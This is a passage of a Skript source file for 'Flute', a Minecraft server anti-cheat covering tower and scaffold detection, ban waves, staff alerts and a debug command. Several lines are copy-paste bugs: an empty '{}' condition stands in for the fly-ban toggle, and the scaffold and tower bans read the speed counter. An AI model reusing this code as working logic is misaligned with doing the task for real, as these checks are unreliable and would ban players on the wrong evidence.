  3207. # Tower
  3208. on place:
  3209. if {flute.tower} is true:
  3210. set {_mp} to {maxping} parsed as number
  3211. if player's ping < {_mp}:
  3212. player's gamemode is not creative
  3213. if block 1 above target block is air:
  3214. if block 1 below target block is set:
  3215. block 1 south 2 below target block is air
  3216. block 1 west 2 below target block is air
  3217. block 1 north 2 below target block is air
  3218. block 1 east 2 below target block is air
  3219. block 1 south 1 below target block is air
  3220. block 1 west 1 below target block is air
  3221. block 1 north 1 below target block is air
  3222. block 1 east 1 below target block is air
  3223. add 1 to {sfw.%player%}
  3224. if {sfw.%player%} > 3:
  3225. cancel event
  3226. set {_p} to player's ping
  3227. loop all players:
  3228. if loop-player has permission "Flute.notify":
  3229. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Tower%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{sfw.%player%}%%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3230. if {sfw.%player%} > 6:
  3231. remove 2 from {sfw.%player%}
  3232. kick player due to "%{logo}% %{maincolor1}%Tower/Scaffold &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3233. wait 1.1 seconds
  3234. remove 1 from {sfw.%player%}
  3235. # Scaffold Walk
  3236. on place:
  3237. if {flute.scaffold} is true:
  3238. set {_mp} to {maxping} parsed as number
  3239. if player's ping < {_mp}:
  3240. player's gamemode is not creative
  3241. if block 1 above target block is air:
  3242. block 1 below is not set
  3243. if block 1 south target block is set:
  3244. block 1 west target block is air
  3245. block 1 north target block is air
  3246. block 1 east target block is air
  3247. add 1 to {sfw2.%player%}
  3248. if {sfw2.%player%} > 2:
  3249. set {_p} to player's ping
  3250. loop all players:
  3251. if loop-player has permission "Flute.notify":
  3252. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Scaffold%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{sfw2.%player%}%%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3253. if {sfw2.%player%} > 6:
  3254. remove 2 from {sfw.%player%}
  3255. kick player due to "%{logo}% %{maincolor1}%Tower/Scaffold &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3256. wait 1.5 seconds
  3257. remove 1 from {sfw2.%player%}
  3258. stop
  3259. if block 1 west target block is set:
  3260. block 1 north target block is air
  3261. block 1 east target block is air
  3262. block 1 south target block is air
  3263. add 1 to {sfw2.%player%}
  3264. if {sfw2.%player%} > 2:
  3265. set {_p} to player's ping
  3266. loop all players:
  3267. if loop-player has permission "Flute.notify":
  3268. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Scaffold%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{sfw2.%player%}%%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3269. if {sfw2.%player%} > 6:
  3270. remove 2 from {sfw.%player%}
  3271. kick player due to "%{logo}% %{maincolor1}%Tower/Scaffold &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3272. wait 1.5 seconds
  3273. remove 1 from {sfw2.%player%}
  3274. stop
  3275. if block 1 north target block is set:
  3276. block 1 east target block is air
  3277. block 1 south target block is air
  3278. block 1 west target block is air
  3279. add 1 to {sfw2.%player%}
  3280. if {sfw2.%player%} > 2:
  3281. set {_p} to player's ping
  3282. loop all players:
  3283. if loop-player has permission "Flute.notify":
  3284. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Scaffold%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{sfw2.%player%}%%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3285. if {sfw2.%player%} > 6:
  3286. remove 2 from {sfw.%player%}
  3287. kick player due to "%{logo}% %{maincolor1}%Tower/Scaffold &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3288. wait 1.5 seconds
  3289. remove 1 from {sfw2.%player%}
  3290. stop
  3291. if block 1 east target block is set:
  3292. block 1 south target block is air
  3293. block 1 west target block is air
  3294. block 1 north target block is air
  3295. add 1 to {sfw2.%player%}
  3296. if {sfw2.%player%} > 2:
  3297. set {_p} to player's ping
  3298. loop all players:
  3299. if loop-player has permission "Flute.notify":
  3300. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Scaffold%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{sfw2.%player%}%%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3301. if {sfw2.%player%} > 6:
  3302. remove 2 from {sfw.%player%}
  3303. kick player due to "%{logo}% %{maincolor1}%Tower/Scaffold &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3304. wait 1.5 seconds
  3305. remove 1 from {sfw2.%player%}
  3306. stop
  3307. else:
  3308. stop
  3309. #==============================================
  3310. #=======================================================
  3311. # Flute | Anti-Cheat =
  3312. # Ban Waves =
  3313. #=======================================================
  3314. on join:
  3315. if {banned.%player%} is true:
  3316. set join message to ""
  3317. kick player due to "%{banmsg}%"
  3318. stop
  3319. on quit:
  3320. if {banned.%player%} is true:
  3321. set quit message to ""
  3322. stop
  3323. every 10 seconds:
  3324. if {flute.bantype} = "banwave":
  3325. loop all players:
  3326. set {_ka} to {kachecks} parsed as number
  3327. set {_akb} to {antikbchecks} parsed as number
  3328. set {_sneak} to {sneakchecks} parsed as number
  3329. set {_fp} to {fastplacechecks} parsed as number
  3330. set {_fb} to {fastbreakchecks} parsed as number
  3331. set {_fastbow} to {fastbowchecks} parsed as number
  3332. set {_fly} to {flychecks} parsed as number
  3333. set {_jesus} to {jesuschecks} parsed as number
  3334. set {_phase} to {phasechecks} parsed as number
  3335. set {_autoclicker} to {autoclickerchecks} parsed as number
  3336. set {_speed} to {speedchecks} parsed as number
  3337. set {_multi} to {multiaurachecks} parsed as number
  3338. set {_scaffold} to {scaffoldchecks} parsed as number
  3339. set {_tower} to {towerchecks} parsed as number
  3340. if {flute.killaura.ban} is true:
  3341. if {killaura.%loop-player%} is greater than or equal to {_ka}:
  3342. execute console command "Flute tban %loop-player% KillAura"
  3343. if {flute.multiaura.ban} is true:
  3344. if {multiaura.%loop-player%} is greater than or equal to {_multi}:
  3345. execute console command "Flute tban %loop-player% MultiAura"
  3346. if {flute.fastbow.ban} is true:
  3347. if {fastbow.%loop-player%} is greater than or equal to {_fastbow}:
  3348. execute console command "Flute tban %loop-player% FastBow"
  3349. if {flute.antikb.ban} is true:
  3350. if {antikb.%loop-player%} is greater than or equal to {_akb}:
  3351. execute console command "Flute tban %loop-player% AntiKB"
  3352. if {flute.sneak.ban} is true:
  3353. if {sneak.%loop-player%} is greater than or equal to {_sneak}:
  3354. execute console command "Flute tban %loop-player% AutoSneak"
  3355. if {flute.fastplace.ban} is true:
  3356. if {fastplace.%loop-player%} is greater than or equal to {_fp}:
  3357. execute console command "Flute tban %loop-player% FastPlace"
  3358. if {flute.fastbreak.ban} is true:
  3359. if {fastbreak.%loop-player%} is greater than or equal to {_fb}:
  3360. execute console command "Flute tban %loop-player% FastBreak"
  3361. if {} is true:
  3362. if {fly.%loop-player%} is greater than or equal to {_fly}:
  3363. execute console command "Flute tban %loop-player% Fly"
  3364. if {flute.jesus.ban} is true:
  3365. if {jesus.%loop-player%} is greater than or equal to {_jesus}:
  3366. execute console command "Flute tban %loop-player% Jesus"
  3367. if {flute.phase.ban} is true:
  3368. if {phase.%loop-player%} is greater than or equal to {_phase}:
  3369. execute console command "Flute tban %loop-player% Phase"
  3370. if {flute.autoclicker.ban} is true:
  3371. if {autoclicker.%loop-player%} is greater than or equal to {_autoclicker}:
  3372. execute console command "Flute tban %loop-player% AutoClicker/FastClicker"
  3373. if {flute.speed.ban} is true:
  3374. if {speed.%loop-player%} is greater than or equal to {_speed}:
  3375. execute console command "Flute tban %loop-player% Speed/BHop"
  3376. if {flute.scaffold.ban} is true:
  3377. if {speed.%loop-player%} is greater than or equal to {_scaffold}:
  3378. execute console command "Flute tban %loop-player% Tower/Scaffold-Walk"
  3379. if {flute.tower.ban} is true:
  3380. if {speed.%loop-player%} is greater than or equal to {_tower}:
  3381. execute console command "Flute tban %loop-player% Tower/ScaffoldWalk"
  3382. if {flute.bantype} = "info":
  3383. loop all players:
  3384. set {_ka} to {kachecks} parsed as number
  3385. set {_akb} to {antikbchecks} parsed as number
  3386. set {_sneak} to {sneakchecks} parsed as number
  3387. set {_fp} to {fastplacechecks} parsed as number
  3388. set {_fb} to {fastbreakchecks} parsed as number
  3389. set {_fastbow} to {fastbowchecks} parsed as number
  3390. set {_fly} to {flychecks} parsed as number
  3391. set {_jesus} to {jesuschecks} parsed as number
  3392. set {_phase} to {phasechecks} parsed as number
  3393. set {_autoclicker} to {autoclickerchecks} parsed as number
  3394. set {_speed} to {speedchecks} parsed as number
  3395. set {_multi} to {multiaurachecks} parsed as number
  3396. set {_tower} to {towerchecks} parsed as number
  3397. set {_scaffold} to {multiaurachecks} parsed as number
  3398. if {flute.killaura.ban} is true:
  3399. if {killaura.%loop-player-1%} is greater than or equal to {_ka}:
  3400. loop all players:
  3401. if loop-player-2 has permission "Flute.notify":
  3402. if {recieve.%loop-player-2%} is true:
  3403. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%KillAura%{maincolor2}%)" to loop-player-2
  3404. clear {killaura.%loop-player-1%}
  3405. if {flute.multiaura.ban} is true:
  3406. if {multiaura.%loop-player-1%} is greater than or equal to {_multi}:
  3407. loop all players:
  3408. if loop-player-2 has permission "Flute.notify":
  3409. if {recieve.%loop-player-2%} is true:
  3410. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%MultiAura%{maincolor2}%)" to loop-player-2
  3411. clear {multiaura.%loop-player-1%}
  3412. if {flute.fastbow.ban} is true:
  3413. if {fastbow.%loop-player-1%} is greater than or equal to {_fastbow}:
  3414. loop all players:
  3415. if loop-player-2 has permission "Flute.notify":
  3416. if {recieve.%loop-player-2%} is true:
  3417. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%FastAura%{maincolor2}%)" to loop-player-2
  3418. clear {fastbow.%loop-player-1%}
  3419. if {flute.antikb.ban} is true:
  3420. if {antikb.%loop-player-1%} is greater than or equal to {_akb}:
  3421. loop all players:
  3422. if loop-player-2 has permission "Flute.notify":
  3423. if {recieve.%loop-player-2%} is true:
  3424. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%AntiKB%{maincolor2}%)" to loop-player-2
  3425. clear {antikb.%loop-player-1%}
  3426. if {flute.sneak.ban} is true:
  3427. if {sneak.%loop-player-1%} is greater than or equal to {_sneak}:
  3428. loop all players:
  3429. if loop-player-2 has permission "Flute.notify":
  3430. if {recieve.%loop-player-2%} is true:
  3431. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%AutoSneak%{maincolor2}%)" to loop-player-2
  3432. clear {sneak.%loop-player-1%}
  3433. if {flute.fastplace.ban} is true:
  3434. if {fastplace.%loop-player-1%} is greater than or equal to {_fp}:
  3435. loop all players:
  3436. if loop-player-2 has permission "Flute.notify":
  3437. if {recieve.%loop-player-2%} is true:
  3438. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%FastPlace%{maincolor2}%)" to loop-player-2
  3439. clear {fastplace.%loop-player-1%}
  3440. if {flute.fastbreak.ban} is true:
  3441. if {fastbreak.%loop-player-1%} is greater than or equal to {_fb}:
  3442. loop all players:
  3443. if loop-player-2 has permission "Flute.notify":
  3444. if {recieve.%loop-player-2%} is true:
  3445. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%FastBreak%{maincolor2}%)" to loop-player-2
  3446. clear {fastbreak.%loop-player-1%}
  3447. if {} is true:
  3448. if {fly.%loop-player-1%} is greater than or equal to {_fly}:
  3449. loop all players:
  3450. if loop-player-2 has permission "Flute.notify":
  3451. if {recieve.%loop-player-2%} is true:
  3452. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%Fly%{maincolor2}%)" to loop-player-2
  3453. clear {fly.%loop-player-1%}
  3454. if {flute.jesus.ban} is true:
  3455. if {jesus.%loop-player-1%} is greater than or equal to {_jesus}:
  3456. loop all players:
  3457. if loop-player-2 has permission "Flute.notify":
  3458. if {recieve.%loop-player-2%} is true:
  3459. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%Jesus%{maincolor2}%)" to loop-player-2
  3460. clear {jesus.%loop-player-1%}
  3461. if {flute.phase.ban} is true:
  3462. if {phase.%loop-player-1%} is greater than or equal to {_phase}:
  3463. loop all players:
  3464. if loop-player-2 has permission "Flute.notify":
  3465. if {recieve.%loop-player-2%} is true:
  3466. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%Phase%{maincolor2}%)" to loop-player-2
  3467. clear {phase.%loop-player-1%}
  3468. if {flute.autoclicker.ban} is true:
  3469. if {autoclicker.%loop-player-1%} is greater than or equal to {_autoclicker}:
  3470. loop all players:
  3471. if loop-player-2 has permission "Flute.notify":
  3472. if {recieve.%loop-player-2%} is true:
  3473. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%FastClick%{maincolor2}%)" to loop-player-2
  3474. clear {autoclicker.%loop-player-1%}
  3475. if {flute.speed.ban} is true:
  3476. if {speed.%loop-player-1%} is greater than or equal to {_speed}:
  3477. loop all players:
  3478. if loop-player-2 has permission "Flute.notify":
  3479. if {recieve.%loop-player-2%} is true:
  3480. send "%{logo}% %{maincolor3}%%loop-player-1% %{maincolor2}%(%{maincolor3}%Most likely hacking: %{maincolor3}%Speed%{maincolor2}%)" to loop-player-2
  3481. clear {speed.%loop-player-1%}
  3482. #=======================================================
  3483. # Flute | Anti-Cheat =
  3484. # Debug CMD =
  3485. #=======================================================
  3486. command /tdebug [<text>] [<text>] [<text>]:
  3487. trigger:
  3488. if player has permission "flute.debug":
  3489. if {flute.debug.mode} = true:
  3490. if arg 1 is not set:
  3491. message "&f-------------------"
  3492. message "&f/tdebug addpoints"
  3493. message "&f/tdebug hits"
  3494. message "&f/tdebug bow"
  3495. message "&f-------------------"
  3496. if arg 1 is "help":
  3497. message "&f-------------------"
  3498. message "&f/tdebug addpoints"
  3499. message "&f/tdebug hits"
  3500. message "&f/tdebug bow"
  3501. message "&f-------------------"
  3502. if arg 1 is "hits":
  3503. if {flute.debug.hits.msg} is not set:
  3504. set {flute.debug.hits.msg} to true
  3505. message "&f[TDEBUG]: Turning hit debug &aon&f..."
  3506. stop
  3507. else:
  3508. clear {flute.debug.hits.msg}
  3509. message "&f[TDEBUG]: Turning hit debug &coff&f..."
  3510. stop
  3511. if arg 1 is "bow":
  3512. if {flute.debug.bow.msg} is not set:
  3513. set {flute.debug.bow.msg} to true
  3514. message "&f[TDEBUG]: Turning bow debug &aon&f..."
  3515. stop
  3516. else:
  3517. clear {flute.debug.bow.msg}
  3518. message "&f[TDEBUG]: Turning bow debug &coff&f..."
  3519. stop
  3520. if arg 1 is "addpoints":
  3521. if arg 2 is not set:
  3522. message "&f/tdebug addpoints [feature] [points]"
  3523. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3524. stop
  3525. if arg 2 is "ka":
  3526. if arg 3 is set:
  3527. add arg 3 to {killaura.%player%}
  3528. message "&f[TDEBUG]: points added..."
  3529. stop
  3530. else:
  3531. message "&f/tdebug addpoints [feature] [points]"
  3532. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3533. stop
  3534. if arg 2 is "fb":
  3535. if arg 3 is set:
  3536. add arg 3 to {fastbow.%player%}
  3537. message "&f[TDEBUG]: points added..."
  3538. stop
  3539. else:
  3540. message "&f/tdebug addpoints [feature] [points]"
  3541. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3542. stop
  3543. if arg 2 is "akb":
  3544. if arg 3 is set:
  3545. add arg 3 to {antikb.%player%}
  3546. message "&f[TDEBUG]: points added..."
  3547. stop
  3548. else:
  3549. message "&f/tdebug addpoints [feature] [points]"
  3550. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3551. stop
  3552. if arg 2 is "fly":
  3553. if arg 3 is set:
  3554. add arg 3 to {fly.%player%}
  3555. message "&f[TDEBUG]: points added..."
  3556. stop
  3557. else:
  3558. message "&f/tdebug addpoints [feature] [points]"
  3559. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3560. stop
  3561. if arg 2 is "jesus":
  3562. if arg 3 is set:
  3563. add arg 3 to {jesus.%player%}
  3564. message "&f[TDEBUG]: points added..."
  3565. stop
  3566. else:
  3567. message "&f/tdebug addpoints [feature] [points]"
  3568. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3569. stop
  3570. if arg 2 is "tower":
  3571. if arg 3 is set:
  3572. add arg 3 to {sfw.%player%}
  3573. message "&f[TDEBUG]: points added..."
  3574. stop
  3575. else:
  3576. message "&f/tdebug addpoints [feature] [points]"
  3577. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3578. stop
  3579. if arg 2 is "scaffold":
  3580. if arg 3 is set:
  3581. add arg 3 to {sfw2.%player%}
  3582. message "&f[TDEBUG]: points added..."
  3583. stop
  3584. else:
  3585. message "&f/tdebug addpoints [feature] [points]"
  3586. message "&fka, fb, akb, fly, jesus, tower, scaffold"
  3587. stop
  3588. else:
  3589. message "%{logo}% &fFlute DEBUG mode is &cnot &factivated..."
  3590. message "&7Please use /Flute debug on"
  3591. stop
  3592. else:
  3593. message "%{logo}% &fDEBUG Permission &cDENIED"
  3594. stop
  3595. on damage:
  3596. if {flute.debug.hits.msg} is true:
  3597. if attacker is a player:
  3598. if damage cause is not projectile:
  3599. if distance between attacker and victim is higher than or equal to 5:
  3600. set {_dist} to distance between attacker and victim
  3601. set {_damage} to damage
  3602. set {_tool} to attacker's tool
  3603. loop all players:
  3604. if loop-player has permission "flute.notify":
  3605. if {recieve.%loop-player%} is true:
  3606. send "&f[TDEBUG]: &c%attacker%" to loop-player
  3607. send " &fDistance: &c%{_dist}%" to loop-player
  3608. send " &fTool: &c%{_tool}%" to loop-player
  3609. send " &fDamage:: &c%{_damage}%" to loop-player
  3610. on damage:
  3611. if {flute.debug.bow.msg} is true:
  3612. if attacker is a player:
  3613. if damage cause is projectile:
  3614. if distance between attacker and victim is higher than or equal to 5:
  3615. set {_dist} to distance between attacker and victim
  3616. set {_damage} to damage
  3617. set {_tool} to attacker's tool
  3618. loop all players:
  3619. if loop-player has permission "flute.notify":
  3620. if {recieve.%loop-player%} is true:
  3621. send "&f[TDEBUG]: &c%attacker%" to loop-player
  3622. send " &fDistance: &c%{_dist}%" to loop-player
  3623. send " &fTool: &c%{_tool}%" to loop-player
  3624. send " &fDamage:: &c%{_damage}%" to loop-player
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